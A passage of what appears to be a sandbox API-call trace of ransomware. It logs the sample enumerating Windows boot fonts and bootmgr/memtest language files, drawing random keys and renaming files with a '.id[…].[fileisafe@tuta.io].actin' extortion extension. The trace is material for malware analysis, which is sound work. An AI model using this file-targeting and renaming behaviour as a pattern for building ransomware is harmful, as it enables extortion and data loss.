"c:\\boot\\fonts\\jpn_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0 [0140.663] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf")) returned 0 [0140.663] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.663] ResetEvent (hEvent=0x29c) returned 1 [0140.663] SetEvent (hEvent=0x2a0) returned 1 [0140.664] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.664] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.665] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2373000) returned 1 [0140.665] CloseHandle (hObject=0x2e0) returned 1 [0140.665] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf")) returned 0x20 [0140.665] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0 [0140.665] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf")) returned 0 [0140.665] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.666] ResetEvent (hEvent=0x29c) returned 1 [0140.666] SetEvent (hEvent=0x2a0) returned 1 [0140.666] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.666] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.667] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=174959) returned 1 [0140.667] CloseHandle (hObject=0x2e0) returned 1 [0140.667] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf")) returned 0x20 [0140.667] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\malgunn_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.668] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.668] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.668] ResetEvent (hEvent=0x29c) returned 1 [0140.668] SetEvent (hEvent=0x2a0) returned 1 [0140.668] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.668] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.669] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=177414) returned 1 [0140.670] CloseHandle (hObject=0x2e0) returned 1 [0140.670] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf")) returned 0x20 [0140.670] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\malgun_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.670] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.670] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.670] ResetEvent (hEvent=0x29c) returned 1 [0140.670] SetEvent (hEvent=0x2a0) returned 1 [0140.670] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.670] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.672] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=143754) returned 1 [0140.672] CloseHandle (hObject=0x2e0) returned 1 [0140.672] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf")) returned 0x20 [0140.673] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\meiryon_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.673] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.673] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.673] ResetEvent (hEvent=0x29c) returned 1 [0140.673] SetEvent (hEvent=0x2a0) returned 1 [0140.673] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.673] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.675] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=145419) returned 1 [0140.675] CloseHandle (hObject=0x2e0) returned 1 [0140.675] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf")) returned 0x20 [0140.675] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\meiryo_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.675] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.675] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.675] ResetEvent (hEvent=0x29c) returned 1 [0140.675] SetEvent (hEvent=0x2a0) returned 1 [0140.676] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.676] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.676] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=162331) returned 1 [0140.676] CloseHandle (hObject=0x2e0) returned 1 [0140.676] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf")) returned 0x20 [0140.676] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msjhn_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.676] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.676] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.678] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.678] ResetEvent (hEvent=0x29c) returned 1 [0140.678] SetEvent (hEvent=0x2a0) returned 1 [0140.678] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.678] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.679] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=154427) returned 1 [0140.679] CloseHandle (hObject=0x2e0) returned 1 [0140.679] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf")) returned 0x20 [0140.679] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msyhn_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.679] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.679] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.680] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.681] ResetEvent (hEvent=0x29c) returned 1 [0140.681] SetEvent (hEvent=0x2a0) returned 1 [0140.681] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.681] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segmono_boot.ttf" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.682] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=44859) returned 1 [0140.682] CloseHandle (hObject=0x2e0) returned 1 [0140.682] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segmono_boot.ttf" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf")) returned 0x20 [0140.682] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segmono_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.682] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segmono_boot.ttf" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.682] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.682] ResetEvent (hEvent=0x29c) returned 1 [0140.682] SetEvent (hEvent=0x2a0) returned 1 [0140.682] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.682] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segoen_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.683] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=85862) returned 1 [0140.683] CloseHandle (hObject=0x2e0) returned 1 [0140.683] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segoen_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf")) returned 0x20 [0140.683] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segoen_slboot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.683] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segoen_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.683] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.684] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.685] ResetEvent (hEvent=0x29c) returned 1 [0140.685] SetEvent (hEvent=0x2a0) returned 1 [0140.685] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.685] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.685] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=49091) returned 1 [0140.685] CloseHandle (hObject=0x2e0) returned 1 [0140.685] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf")) returned 0x20 [0140.685] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.685] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.685] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.981] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.981] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0140.981] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=78176) returned 1 [0140.981] CloseHandle (hObject=0x2f0) returned 1 [0140.981] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui")) returned 0x20 [0140.981] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.981] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.982] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.982] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\memtest.exe.mui" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0140.982] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=45472) returned 1 [0140.982] CloseHandle (hObject=0x2f0) returned 1 [0140.982] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\memtest.exe.mui" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui")) returned 0x20 [0140.982] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.982] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\memtest.exe.mui" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.982] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.982] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0140.983] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=77656) returned 1 [0140.983] CloseHandle (hObject=0x2f0) returned 1 [0140.983] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui")) returned 0x20 [0140.983] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.983] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.983] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.983] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\memtest.exe.mui" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0140.983] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=45984) returned 1 [0140.983] CloseHandle (hObject=0x2f0) returned 1 [0140.983] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\memtest.exe.mui" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui")) returned 0x20 [0140.983] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.983] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\memtest.exe.mui" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.983] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.984] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0140.984] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=76640) returned 1 [0140.984] CloseHandle (hObject=0x2f0) returned 1 [0140.984] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui")) returned 0x20 [0140.984] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.984] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.984] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.984] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\memtest.exe.mui" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0140.984] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=45472) returned 1 [0140.984] CloseHandle (hObject=0x2f0) returned 1 [0140.987] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\memtest.exe.mui" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui")) returned 0x20 [0140.987] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.987] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\memtest.exe.mui" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.988] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.988] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0140.988] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=76640) returned 1 [0140.988] CloseHandle (hObject=0x2f0) returned 1 [0140.988] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui")) returned 0x20 [0140.988] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.988] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.988] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.988] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\memtest.exe.mui" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 